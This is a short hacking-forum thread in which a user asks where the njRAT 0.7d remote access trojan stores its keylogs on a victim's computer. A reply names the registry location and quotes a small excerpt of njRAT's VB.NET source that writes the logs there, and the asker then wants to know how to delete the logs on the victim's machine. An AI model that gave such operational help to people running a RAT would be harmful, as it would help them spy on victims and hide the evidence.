• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

njRAT 0.7d keylog

Status
Not open for further replies.

shahg

Leech
User
Joined
Dec 20, 2012
Messages
26
Reputation
0
Reaction score
5
Points
3
Credits
0
‎12 Years of Service‎
52%
Hi , can anyone tell me where njRAT 0.7d keylog file is stored on victim pc

i mean to say location of keylog file. THX

 
Re: njRAT 0.7d keylog

hi .

Logs Seved to Registry

Run > regedit

Code:
>HKEY_CURRENT_USER\SOFTWARE\
+ Regkeyname Often a20df4c6683a2597306abf37b4d45294 Or Look Like This \

1BvE3L.png


Source Code Njrat 7 To Writhe

Code:
>OK.STV(Me.vn, Me.Logs, RegistryValueKind.String)
Code:
>        Public Shared Function STV(ByVal n As String, ByVal t As Object, ByVal typ As RegistryValueKind) As Boolean
           Dim flag As Boolean
           Try
               OK.F.Registry.CurrentUser.CreateSubKey(("Software\" & OK.RG)).SetValue(n, RuntimeHelpers.GetObjectValue(t), typ)
               flag = True
           Catch exception1 As Exception
               ProjectData.SetProjectError(exception1)
               Dim exception As Exception = exception1
               flag = False
               ProjectData.ClearProjectError()
           End Try
           Return flag
       End Function
 
Re: njRAT 0.7d keylog

THX 4 info . is there a way to delete logs on victim pc or disable keylogger ?

 
Status
Not open for further replies.
Back
Top